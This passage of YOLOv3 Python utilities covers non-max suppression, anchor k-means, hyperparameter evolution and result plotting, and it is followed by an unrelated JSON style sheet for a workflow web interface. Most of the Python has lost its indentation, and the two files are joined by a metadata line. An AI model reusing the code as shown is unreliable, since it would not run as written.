x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
except: # possible CUDA error https://github.com/ultralytics/yolov3/issues/1139
pass
elif method == 'vision':
i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)
elif method == 'fast': # FastNMS from https://github.com/dbolya/yolact
iou = box_iou(boxes, boxes).triu_(diagonal=1) # upper triangular iou matrix
i = iou.max(0)[0] < iou_thres
output[xi] = x[i]
return output
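# Editor's illustrative sketch (hypothetical helper, not part of the original module): runs the NMS above
# on one fabricated image with two classes. Rows are [x, y, w, h, obj, cls0, cls1]; the two overlapping
# class-0 boxes collapse into a single (merged) detection and the class-1 box survives.
def _demo_non_max_suppression():
    pred = torch.tensor([[[100., 100., 50., 60., 0.90, 0.80, 0.10],
                          [102., 98., 48., 62., 0.85, 0.70, 0.20],
                          [300., 300., 40., 40., 0.95, 0.05, 0.90]]])
    out = non_max_suppression(pred, conf_thres=0.3, iou_thres=0.6)
    print(out[0])  # two rows of (x1, y1, x2, y2, conf, cls)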
def get_yolo_layers(model):
bool_vec = [x['type'] == 'yolo' for x in model.module_defs]
return [i for i, x in enumerate(bool_vec) if x] # [82, 94, 106] for yolov3
def print_model_biases(model):
# prints the bias neurons preceding each yolo layer
print('\nModel Bias Summary: %8s%18s%18s%18s' % ('layer', 'regression', 'objectness', 'classification'))
try:
multi_gpu = type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
for l in model.yolo_layers: # print pretrained biases
if multi_gpu:
na = model.module.module_list[l].na # number of anchors
b = model.module.module_list[l - 1][0].bias.view(na, -1) # bias 3x85
else:
na = model.module_list[l].na
b = model.module_list[l - 1][0].bias.view(na, -1) # bias 3x85
print(' ' * 20 + '%8g %18s%18s%18s' % (l, '%5.2f+/-%-5.2f' % (b[:, :4].mean(), b[:, :4].std()),
'%5.2f+/-%-5.2f' % (b[:, 4].mean(), b[:, 4].std()),
'%5.2f+/-%-5.2f' % (b[:, 5:].mean(), b[:, 5:].std())))
except:
pass
def strip_optimizer(f='weights/last.pt'): # from utils.utils import *; strip_optimizer()
# Strip optimizer from *.pt files for lighter files (reduced by 2/3 size)
x = torch.load(f, map_location=torch.device('cpu'))
x['optimizer'] = None
torch.save(x, f)
def create_backbone(f='weights/last.pt'): # from utils.utils import *; create_backbone()
# create a backbone from a *.pt file
x = torch.load(f, map_location=torch.device('cpu'))
x['optimizer'] = None
x['training_results'] = None
x['epoch'] = -1
for p in x['model'].values():
try:
p.requires_grad = True
except:
pass
torch.save(x, 'weights/backbone.pt')
def coco_class_count(path='../coco/labels/train2014/'):
# Histogram of occurrences per class
nc = 80 # number classes
x = np.zeros(nc, dtype='int32')
files = sorted(glob.glob('%s/*.*' % path))
for i, file in enumerate(files):
labels = np.loadtxt(file, dtype=np.float32).reshape(-1, 5)
x += np.bincount(labels[:, 0].astype('int32'), minlength=nc)
print(i, len(files))
def coco_only_people(path='../coco/labels/train2017/'): # from utils.utils import *; coco_only_people()
# Find images with only people
files = sorted(glob.glob('%s/*.*' % path))
for i, file in enumerate(files):
labels = np.loadtxt(file, dtype=np.float32).reshape(-1, 5)
if all(labels[:, 0] == 0):
print(labels.shape[0], file)
def select_best_evolve(path='evolve*.txt'): # from utils.utils import *; select_best_evolve()
# Find best evolved mutation
for file in sorted(glob.glob(path)):
x = np.loadtxt(file, dtype=np.float32, ndmin=2)
print(file, x[fitness(x).argmax()])
def crop_images_random(path='../images/', scale=0.50): # from utils.utils import *; crop_images_random()
# crops images into random squares up to scale fraction
# WARNING: overwrites images!
for file in tqdm(sorted(glob.glob('%s/*.*' % path))):
img = cv2.imread(file) # BGR
if img is not None:
h, w = img.shape[:2]
# create random mask
a = 30 # minimum size (pixels)
mask_h = random.randint(a, int(max(a, h * scale))) # mask height
mask_w = mask_h # mask width
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
            # overwrite the original image with the random crop
cv2.imwrite(file, img[ymin:ymax, xmin:xmax])
def coco_single_class_labels(path='../coco/labels/train2014/', label_class=43):
# Makes single-class coco datasets. from utils.utils import *; coco_single_class_labels()
if os.path.exists('new/'):
shutil.rmtree('new/') # delete output folder
os.makedirs('new/') # make new output folder
os.makedirs('new/labels/')
os.makedirs('new/images/')
for file in tqdm(sorted(glob.glob('%s/*.*' % path))):
with open(file, 'r') as f:
labels = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
i = labels[:, 0] == label_class
if any(i):
img_file = file.replace('labels', 'images').replace('txt', 'jpg')
labels[:, 0] = 0 # reset class to 0
with open('new/images.txt', 'a') as f: # add image to dataset list
f.write(img_file + '\n')
with open('new/labels/' + Path(file).name, 'a') as f: # write label
for l in labels[i]:
f.write('%g %.6f %.6f %.6f %.6f\n' % tuple(l))
shutil.copyfile(src=img_file, dst='new/images/' + Path(file).name.replace('txt', 'jpg')) # copy images
def kmean_anchors(path='./data/coco64.txt', n=9, img_size=(320, 1024), thr=0.20, gen=1000):
# Creates kmeans anchors for use in *.cfg files: from utils.utils import *; _ = kmean_anchors()
# n: number of anchors
# img_size: (min, max) image size used for multi-scale training (can be same values)
# thr: IoU threshold hyperparameter used for training (0.0 - 1.0)
# gen: generations to evolve anchors using genetic algorithm
from utils.datasets import LoadImagesAndLabels
def print_results(k):
k = k[np.argsort(k.prod(1))] # sort small to large
iou = wh_iou(wh, torch.Tensor(k))
max_iou = iou.max(1)[0]
bpr, aat = (max_iou > thr).float().mean(), (iou > thr).float().mean() * n # best possible recall, anch > thr
print('%.2f iou_thr: %.3f best possible recall, %.2f anchors > thr' % (thr, bpr, aat))
print('n=%g, img_size=%s, IoU_all=%.3f/%.3f-mean/best, IoU>thr=%.3f-mean: ' %
(n, img_size, iou.mean(), max_iou.mean(), iou[iou > thr].mean()), end='')
for i, x in enumerate(k):
print('%i,%i' % (round(x[0]), round(x[1])), end=', ' if i < len(k) - 1 else '\n') # use in *.cfg
return k
def fitness(k): # mutation fitness
iou = wh_iou(wh, torch.Tensor(k)) # iou
max_iou = iou.max(1)[0]
return (max_iou * (max_iou > thr).float()).mean() # product
# Get label wh
wh = []
dataset = LoadImagesAndLabels(path, augment=True, rect=True)
nr = 1 if img_size[0] == img_size[1] else 10 # number augmentation repetitions
for s, l in zip(dataset.shapes, dataset.labels):
wh.append(l[:, 3:5] * (s / s.max())) # image normalized to letterbox normalized wh
wh = np.concatenate(wh, 0).repeat(nr, axis=0) # augment 10x
wh *= np.random.uniform(img_size[0], img_size[1], size=(wh.shape[0], 1)) # normalized to pixels (multi-scale)
wh = wh[(wh > 2.0).all(1)] # remove below threshold boxes (< 2 pixels wh)
# Darknet yolov3.cfg anchors
use_darknet = False
if use_darknet and n == 9:
k = np.array([[10, 13], [16, 30], [33, 23], [30, 61], [62, 45], [59, 119], [116, 90], [156, 198], [373, 326]])
else:
# Kmeans calculation
from scipy.cluster.vq import kmeans
print('Running kmeans for %g anchors on %g points...' % (n, len(wh)))
s = wh.std(0) # sigmas for whitening
k, dist = kmeans(wh / s, n, iter=30) # points, mean distance
k *= s
wh = torch.Tensor(wh)
k = print_results(k)
# # Plot
# k, d = [None] * 20, [None] * 20
# for i in tqdm(range(1, 21)):
# k[i-1], d[i-1] = kmeans(wh / s, i) # points, mean distance
# fig, ax = plt.subplots(1, 2, figsize=(14, 7))
# ax = ax.ravel()
# ax[0].plot(np.arange(1, 21), np.array(d) ** 2, marker='.')
# fig, ax = plt.subplots(1, 2, figsize=(14, 7)) # plot wh
# ax[0].hist(wh[wh[:, 0]<100, 0],400)
# ax[1].hist(wh[wh[:, 1]<100, 1],400)
# fig.tight_layout()
# fig.savefig('wh.png', dpi=200)
# Evolve
npr = np.random
    f, sh, mp, s = fitness(k), k.shape, 0.9, 0.1  # fitness, anchor array shape, mutation probability, sigma
for _ in tqdm(range(gen), desc='Evolving anchors'):
v = np.ones(sh)
while (v == 1).all(): # mutate until a change occurs (prevent duplicates)
v = ((npr.random(sh) < mp) * npr.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0) # 98.6, 61.6
kg = (k.copy() * v).clip(min=2.0)
fg = fitness(kg)
if fg > f:
f, k = fg, kg.copy()
print_results(k)
k = print_results(k)
return k
def print_mutation(hyp, results, bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, mAP, F1, test_loss)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % bucket) # download evolve.txt
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
np.savetxt('evolve.txt', x[np.argsort(-fitness(x))], '%10.3g') # save sort by fitness
if bucket:
os.system('gsutil cp evolve.txt gs://%s' % bucket) # upload evolve.txt
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
                im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x224x224
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
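# Hedged usage sketch for apply_classifier (variable names are hypothetical; the second-stage
# model must accept 224x224 RGB input and share the detector's class indices):
#   det = non_max_suppression(pred, conf_thres, iou_thres) # one (n, 6) tensor per image
#   det = apply_classifier(det, classifier_model, img, im0s) # keep boxes where both models agree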
def fitness(x):
# Returns fitness (for use with results.txt or evolve.txt)
    w = [0.0, 0.00, 1, 0.00] # weights for [P, R, mAP, F1]@0.5 or [P, R, mAP@0.5, mAP@0.5:0.95]
return (x[:, :4] * w).sum(1)
def output_to_target(output, width, height):
"""
Convert a YOLO model output to target format
[batch_id, class_id, x, y, w, h, conf]
"""
if isinstance(output, torch.Tensor):
output = output.cpu().numpy()
targets = []
for i, o in enumerate(output):
if o is not None:
for pred in o:
box = pred[:4]
w = (box[2] - box[0]) / width
h = (box[3] - box[1]) / height
x = box[0] / width + w / 2
y = box[1] / height + h / 2
conf = pred[4]
cls = int(pred[5])
targets.append([i, cls, x, y, w, h, conf])
return np.array(targets)
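# Worked example of the conversion above (illustrative numbers): with width = height = 640,
# a prediction [x1, y1, x2, y2, conf, cls] = [0, 0, 64, 64, 0.9, 3] from image i becomes
# [i, 3, 0.05, 0.05, 0.1, 0.1, 0.9] (normalized centre x/y, width, height, then confidence).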
# Plotting functions ---------------------------------------------------------------------------------------------------
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
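# Example call (illustrative values; 'image.jpg' is a hypothetical path):
#   img = cv2.imread('image.jpg')
#   plot_one_box([50, 30, 200, 180], img, color=(0, 255, 0), label='person 0.92')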
def plot_wh_methods(): # from utils.utils import *; plot_wh_methods()
# Compares the two methods for width-height anchor multiplication
# https://github.com/ultralytics/yolov3/issues/168
x = np.arange(-4.0, 4.0, .1)
ya = np.exp(x)
yb = torch.sigmoid(torch.from_numpy(x)).numpy() * 2
fig = plt.figure(figsize=(6, 3), dpi=150)
plt.plot(x, ya, '.-', label='yolo method')
plt.plot(x, yb ** 2, '.-', label='^2 power method')
plt.plot(x, yb ** 2.5, '.-', label='^2.5 power method')
plt.xlim(left=-4, right=4)
plt.ylim(bottom=0, top=6)
plt.xlabel('input')
plt.ylabel('output')
plt.legend()
fig.tight_layout()
fig.savefig('comparison.png', dpi=200)
def plot_images(images, targets, paths=None, fname='images.jpg', names=None, max_size=640, max_subplots=16):
tl = 3 # line thickness
tf = max(tl - 1, 1) # font thickness
if isinstance(images, torch.Tensor):
images = images.cpu().numpy()
if isinstance(targets, torch.Tensor):
targets = targets.cpu().numpy()
# un-normalise
if np.max(images[0]) <= 1:
images *= 255
bs, _, h, w = images.shape # batch size, _, height, width
bs = min(bs, max_subplots) # limit plot images
ns = np.ceil(bs ** 0.5) # number of subplots (square)
# Check if we should resize
scale_factor = max_size / max(h, w)
if scale_factor < 1:
h = math.ceil(scale_factor * h)
w = math.ceil(scale_factor * w)
# Empty array for output
mosaic = np.full((int(ns * h), int(ns * w), 3), 255, dtype=np.uint8)
# Fix class - colour map
prop_cycle = plt.rcParams['axes.prop_cycle']
# https://stackoverflow.com/questions/51350872/python-from-color-name-to-rgb
hex2rgb = lambda h: tuple(int(h[1 + i:1 + i + 2], 16) for i in (0, 2, 4))
color_lut = [hex2rgb(h) for h in prop_cycle.by_key()['color']]
for i, img in enumerate(images):
        if i == max_subplots: # limit to max_subplots images
break
block_x = int(w * (i // ns))
block_y = int(h * (i % ns))
img = img.transpose(1, 2, 0)
if scale_factor < 1:
img = cv2.resize(img, (w, h))
mosaic[block_y:block_y + h, block_x:block_x + w, :] = img
if len(targets) > 0:
image_targets = targets[targets[:, 0] == i]
boxes = xywh2xyxy(image_targets[:, 2:6]).T
classes = image_targets[:, 1].astype('int')
gt = image_targets.shape[1] == 6 # ground truth if no conf column
conf = None if gt else image_targets[:, 6] # check for confidence presence (gt vs pred)
boxes[[0, 2]] *= w
boxes[[0, 2]] += block_x
boxes[[1, 3]] *= h
boxes[[1, 3]] += block_y
for j, box in enumerate(boxes.T):
cls = int(classes[j])
color = color_lut[cls % len(color_lut)]
cls = names[cls] if names else cls
if gt or conf[j] > 0.3: # 0.3 conf thresh
label = '%s' % cls if gt else '%s %.1f' % (cls, conf[j])
plot_one_box(box, mosaic, label=label, color=color, line_thickness=tl)
# Draw image filename labels
if paths is not None:
label = os.path.basename(paths[i])[:40] # trim to 40 char
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
cv2.putText(mosaic, label, (block_x + 5, block_y + t_size[1] + 5), 0, tl / 3, [220, 220, 220], thickness=tf,
lineType=cv2.LINE_AA)
# Image border
cv2.rectangle(mosaic, (block_x, block_y), (block_x + w, block_y + h), (255, 255, 255), thickness=3)
if fname is not None:
cv2.imwrite(fname, cv2.cvtColor(mosaic, cv2.COLOR_BGR2RGB))
return mosaic
def plot_test_txt(): # from utils.utils import *; plot_test()
# Plot test.txt histograms
x = np.loadtxt('test.txt', dtype=np.float32)
box = xyxy2xywh(x[:, :4])
cx, cy = box[:, 0], box[:, 1]
fig, ax = plt.subplots(1, 1, figsize=(6, 6))
ax.hist2d(cx, cy, bins=600, cmax=10, cmin=0)
ax.set_aspect('equal')
fig.tight_layout()
plt.savefig('hist2d.png', dpi=300)
fig, ax = plt.subplots(1, 2, figsize=(12, 6))
ax[0].hist(cx, bins=600)
ax[1].hist(cy, bins=600)
fig.tight_layout()
plt.savefig('hist1d.png', dpi=200)
def plot_targets_txt(): # from utils.utils import *; plot_targets_txt()
# Plot targets.txt histograms
x = np.loadtxt('targets.txt', dtype=np.float32).T
s = ['x targets', 'y targets', 'width targets', 'height targets']
fig, ax = plt.subplots(2, 2, figsize=(8, 8))
ax = ax.ravel()
for i in range(4):
ax[i].hist(x[i], bins=100, label='%.3g +/- %.3g' % (x[i].mean(), x[i].std()))
ax[i].legend()
ax[i].set_title(s[i])
fig.tight_layout()
plt.savefig('targets.jpg', dpi=200)
def plot_evolution_results(hyp): # from utils.utils import *; plot_evolution_results(hyp)
# Plot hyperparameter evolution results in evolve.txt
x = np.loadtxt('evolve.txt', ndmin=2)
f = fitness(x)
weights = (f - f.min()) ** 2 # for weighted results
fig = plt.figure(figsize=(12, 10))
matplotlib.rc('font', **{'size': 8})
for i, (k, v) in enumerate(hyp.items()):
y = x[:, i + 7]
# mu = (y * weights).sum() / weights.sum() # best weighted result
mu = y[f.argmax()] # best single result
plt.subplot(4, 5, i + 1)
plt.plot(mu, f.max(), 'o', markersize=10)
plt.plot(y, f, '.')
plt.title('%s = %.3g' % (k, mu), fontdict={'size': 9}) # limit to 40 characters
print('%15s: %.3g' % (k, mu))
fig.tight_layout()
plt.savefig('evolve.png', dpi=200)
def plot_results_overlay(start=0, stop=0): # from utils.utils import *; plot_results_overlay()
# Plot training results files 'results*.txt', overlaying train and val losses
    s = ['train', 'train', 'train', 'Precision', 'mAP@0.5', 'val', 'val', 'val', 'Recall', 'F1'] # legends
t = ['GIoU', 'Objectness', 'Classification', 'P-R', 'mAP-F1'] # titles
for f in sorted(glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')):
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
fig, ax = plt.subplots(1, 5, figsize=(14, 3.5))
ax = ax.ravel()
for i in range(5):
for j in [i, i + 5]:
y = results[j, x]
if i in [0, 1, 2]:
                    y[y == 0] = np.nan # don't show zero loss values
ax[i].plot(x, y, marker='.', label=s[j])
ax[i].set_title(t[i])
ax[i].legend()
ax[i].set_ylabel(f) if i == 0 else None # add filename
fig.tight_layout()
fig.savefig(f.replace('.txt', '.png'), dpi=200)
def plot_results(start=0, stop=0, bucket='', id=()): # from utils.utils import *; plot_results()
# Plot training 'results*.txt' as seen in https://github.com/ultralytics/yolov3#training
fig, ax = plt.subplots(2, 5, figsize=(12, 6))
ax = ax.ravel()
s = ['GIoU', 'Objectness', 'Classification', 'Precision', 'Recall',
         'val GIoU', 'val Objectness', 'val Classification', 'mAP@0.5', 'F1']
if bucket:
os.system('rm -rf storage.googleapis.com')
files = ['https://storage.googleapis.com/%s/results%g.txt' % (bucket, x) for x in id]
else:
files = glob.glob('results*.txt') + glob.glob('../../Downloads/results*.txt')
for f in sorted(files):
try:
results = np.loadtxt(f, usecols=[2, 3, 4, 8, 9, 12, 13, 14, 10, 11], ndmin=2).T
n = results.shape[1] # number of rows
x = range(start, min(stop, n) if stop else n)
for i in range(10):
y = results[i, x]
if i in [0, 1, 2, 5, 6, 7]:
                    y[y == 0] = np.nan # don't show zero loss values
# y /= y[0] # normalize
ax[i].plot(x, y, marker='.', label=Path(f).stem, linewidth=2, markersize=8)
ax[i].set_title(s[i])
if i in [5, 6, 7]: # share train and val loss y axes
ax[i].get_shared_y_axes().join(ax[i], ax[i - 5])
        except Exception:
print('Warning: Plotting error for %s, skipping file' % f)
fig.tight_layout()
ax[1].legend()
fig.savefig('results.png', dpi=200)
| {
"pile_set_name": "Github"
} |
{
"toolbarNode": {
"overflow": "hidden",
"height": "80px",
"border-bottom-left-radius": "0px",
"border-bottom-right-radius": "0px",
"border-bottom": "1px solid #314e69",
"border-right": "1px solid #314e69",
"border-left": "1px solid #314e69",
"margin-right": "0px",
"margin-left": "0px",
"background-color": "#4c6b87",
"position": "static"
},
"iconElementNode": {
"float": "left",
"width": "80px",
"height": "80px",
"background-position": "center center",
"background-repeat": "no-repeat",
"cursor": "pointer"
},
"titleElementNode": {
"float": "left",
"width": "180px",
"height": "80px",
"line-height": "80px",
"color": "#FFF",
"font-weight": "bold",
"font-family": "Microsoft YaHei",
"font-size": "18px",
"margin-left": "5px"
},
"toCompletedNode": {
"padding": "5px 10px",
"float": "right",
"margin-right": "30px",
"border": "1px solid #DDD",
"color": "#DDD",
"background": "#5d80a0",
"margin-top": "25px",
"cursor": "pointer",
"font-size": "14px",
"border-radius": "5px"
//"box-shadow": "0px 0px 0px #333"
},
"toCompletedNode_over": {
"border": "1px solid #666",
"color": "#666",
"background": "#d5e7f8"
},
"searchElementNode": {
"margin-left": "362px",
"overflow": "hidden"
},
"searchElementButtonNode": {
"float": "right",
"width": "80px",
"height": "80px",
"margin-right": "40px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/search.png) no-repeat center center",
"cursor": "pointer"
},
"searchElementInputAreaNode": {
"margin-right": "120px",
"text-align": "right"
},
"searchElementInputBoxNode": {
"margin-top": "25px",
"width": "80%",
"max-width": "500px",
"height": "30px",
"border-radius": "5px",
"background-color": "#EEE",
"float": "right",
"text-align": "center"
},
"searchElementInputNode": {
"width": "96%",
"height": "28px",
"border": "0px",
"font-family": "Microsoft YaHei",
"font-size": "14px",
"color": "#999",
"background": "transparent",
"-webkit-user-select": "auto",
"-moz-user-select": "auto"
},
"elementContentNode": {
"overflow": "auto",
"position": "static",
"-webkit-user-select": "text",
"-moz-user-select": "text",
"margin": "0px 0px"
},
"elementContentListNode": {
"overflow": "hidden",
"padding-bottom": "20px",
"margin-right": "10px",
"-webkit-user-select": "text",
"-moz-user-select": "text",
"margin-left": "10px"
},
"filterNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"viewFilterNode": {
"min-height": "40px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"viewFilterListAreaNode": {
"min-height": "40px",
"margin-right": "90px",
"overflow": "hidden"
},
"viewFilterListTitleNode": {
"width": "60px",
"font-size": "14px",
"color": "#666666",
"font-weight": "bold",
"float": "left",
"line-height": "40px",
"height": "40px"
},
"viewFilterListNode": {
"margin-left": "70px",
"min-height": "40px",
"overflow": "hidden"
},
"viewFilterSearchAreaNode": {
"min-height": "40px",
"overflow": "hidden",
"display": "none"
},
"viewFilterSearchInputAreaNode": {
"min-width": "300px",
"width": "40%",
"height": "24px",
"border": "1px solid #cccccc",
"margin-top": "7px",
"margin-bottom": "0px",
"float": "left",
"border-radius": "5px"
},
"viewFilterSearchInputAreaNode_custom": {
"width": "auto",
"height": "80px",
"border": "1px solid #cccccc",
"margin-top": "7px",
"float": "none",
"border-radius": "5px",
"margin-bottom": "7px"
},
"viewFilterSearchCustomActionNode": {
"height": "22px",
"line-height": "22px",
"border": "1px solid #cccccc",
"color": "#333333",
"text-align": "center",
"margin-top": "8px",
"padding": "0px 10px",
"float": "left",
"cursor": "pointer",
"border-radius": "5px",
"margin-left": "10px"
},
"viewFilterSearchIconNode": {
"height": "24px",
"width": "40px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/searchView.png) center center no-repeat",
"float": "right",
"cursor": "pointer"
},
"viewFilterSearchInputBoxNode": {
"margin-right": "40px",
"margin-left": "5px",
"height": "24px",
"overflow": "hidden"
},
"viewFilterSearchInputNode": {
"width": "99%",
"height": "22px",
"color": "#999999",
"border-radius": "5px",
"border": "0px"
},
"viewFilterSearchCustomCloseActionNode": {
"width": "20px",
"height": "80px",
"float": "right",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/back.png) center 5px no-repeat",
"cursor": "pointer"
},
"viewFilterSearchCustomContentNode": {
"height": "80px",
"margin-right": "20px"
},
"viewFilterSearchCustomPathContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "99px",
"float": "left"
},
"viewFilterSearchCustomComparisonContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "99px",
"float": "left"
},
"viewFilterSearchCustomValueContentNode": {
"height": "80px",
"border-right": "1px solid #cccccc",
"width": "199px",
"float": "left"
},
"viewFilterSearchCustomAddContentNode": {
"width": "19px",
"height": "80px",
"border-right": "1px solid #cccccc",
"background-color": "#eeeeee",
"float": "left",
"cursor": "pointer"
},
"viewFilterSearchCustomAddIconNode": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/right.png) center center no-repeat",
"height": "80px"
},
"viewFilterSearchCustomFilterContentNode": {
"height": "74px",
"padding": "3px",
"overflow": "auto",
"margin-left": "420px"
},
"viewFilterSearchCustomPathListNode": {
"border": "0px",
"border-radius": "5px",
"height": "80px",
"padding": "3px",
"width": "99px",
"font-size": "12px"
},
"viewFilterSearchCustomComparisonListNode": {
"border": "0px",
"height": "80px",
"padding": "3px",
"width": "99px",
"font-size": "12px"
},
"viewFilterSearchOptionNode": {
"margin": "3px"
},
"viewFilterSearchCustomValueNode": {
"border": "0px",
"height": "78px",
"overflow": "auto",
"width": "197px"
},
"viewFilterSearchCustomValueSelectNode": {
"border": "0px",
"padding": "2px",
"height": "74px",
"overflow": "auto",
"width": "194px"
},
"viewSearchFilterNode": {
"height": "19px",
"margin": "2px",
"line-height": "19px",
"border": "1px solid #cccccc",
"border-radius": "3px",
"cursor": "pointer",
"color": "#666666",
"float": "left"
},
"viewSearchFilterNode_over": {
"border": "1px solid #fe9145",
//"color": "#fe9145",
},
"viewSearchFilterTextNode": {
"height": "19px",
"padding": "0px 3px",
"float": "left"
},
"viewSearchFilterDeleteNode": {
"width": "20px",
"height": "19px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delFilter.png) center center no-repeat",
"float": "left"
},
"viewSearchFilterDeleteNode_over": {
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/delFilter_over.png) center center no-repeat"
},
"viewSearchFilterSelectAreaNode": {
"height": "17px",
"padding": "0px 3px",
"margin": "1px 3px",
"background-color": "#dddddd",
"border-radius": "8px",
"color": "#333333",
"float": "left"
},
"viewSearchFilterSelectNode": {
"line-height": "17px",
"height": "15px",
"padding": "0px 2px",
"font-size": "11px",
"float": "left"
},
"viewSearchFilterSelectButtonNode": {
"float": "right",
"height": "13px",
"width": "13px",
"margin": "2px 0px",
"border-radius": "6px",
"background-color": "#666666",
},
"viewSearchFilterSelectButtonNode_over": {
"background-color": "#fe9145"
},
"exportViewNode": {
"padding": "3px 10px",
"float": "right",
"margin-right": "5px",
"margin-top": "5px",
"border": "1px solid #CCC",
"cursor": "pointer",
"background-color": "#FFF",
"border-radius": "5px",
"color": "#000"
},
"filterAllProcessNode": {
"height": "40px",
"width": "80px",
"float": "left",
"line-height": "40px",
"font-size": "18px",
"text-align": "center",
"cursor": "pointer",
"font-weight": "bold"
},
"filterAllProcessCountNode":{
"font-size": "14px",
"color": "#666"
},
"filterActionAreaNode":{
"height": "40px",
"width": "80px",
"float": "right"
},
"filterActionNode":{
"margin": "7px 25px 7px 5px",
"height": "26px",
"width": "50px",
"cursor": "pointer",
"background-color": "#5d7282",
"border": "1px solid #666666",
"border-radius": "3px",
"line-height": "26px",
"text-align": "center",
"color": "#FFF"
},
"filterActionNode_over":{
"background-color": "#ff7010",
"border": "1px solid #ff7010"
},
"filterProcessAreaNode": {
"margin": "0px 80px",
"min-height": "40px",
"overflow": "hidden"
},
"filterProcessListNode": {
"margin": "8px",
"line-height": "24px"
},
"filterProcessNode": {
"float": "left",
"margin-left": "10px",
"margin-right": "10px",
"color": "#666",
"cursor": "pointer",
"font-size": "14px",
"font-weight": "normal"
},
"filterProcessNode_current": {
"font-weight": "bold",
"color": "#0000FF",
"font-size": "16px"
},
"filterAreaNode": {
"border": "1px solid #999",
"border-radius": "0px",
"box-shadow": "0px 6px 10px #999",
"background-color": "#FFF",
"display": "block",
"position": "absolute"
},
"filterAreaTipNode":{
"width": "24px",
"height": "6px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/sj.png) center top no-repeat",
},
"filterAreaTitleNode": {
"height": "50px",
"overflow": "hidden",
"border-bottom": "1px solid #999"
},
"filterAreaTitleActionOkNode": {
"margin-top": "13px",
"height": "22px",
"line-height": "22px",
"width": "40px",
"cursor": "pointer",
"border-radius": "3px",
"color": "#ff7010",
"background-color": "#FFF",
"border": "1px solid #ff7010",
"float": "right",
"text-align": "center",
"font-size": "12px",
"margin-right": "10px"
},
"filterAreaTitleActionClearNode": {
"margin-top": "13px",
"height": "22px",
"line-height": "22px",
"width": "40px",
"cursor": "pointer",
"border-radius": "3px",
"color": "#666",
"background-color": "#FFF",
"border": "1px solid #666",
"float": "right",
"text-align": "center",
"font-size": "12px",
"margin-right": "10px"
},
"filterAreaTitleSearchNode": {
"margin": "13px 120px 0px 15px",
"height": "22px",
"border": "1px solid #CCC",
"border-radius": "4px"
},
"filterAreaTitleSearchIconNode": {
"height": "22px",
"width": "22px",
"background": "url("+"../x_component_process_Application/$WorkExplorer/default/icon/filterSearch.png) center center no-repeat",
"float": "left"
},
"filterAreaTitleSearchInputAreaNode": {
"height": "22px",
"border": "0px",
"margin-left": "22px"
},
"filterAreaTitleSearchInputNode": {
"height": "20px",
"border": "0px",
"color": "#999",
"width": "98%",
"font-size": "12px",
"line-height": "20px"
},
"applicationFilterAreaContentScrollNode": {
"height": "410px",
"width": "400px",
"margin": "20px 0px 20px 20px",
"overflow": "hidden",
"float": "left"
},
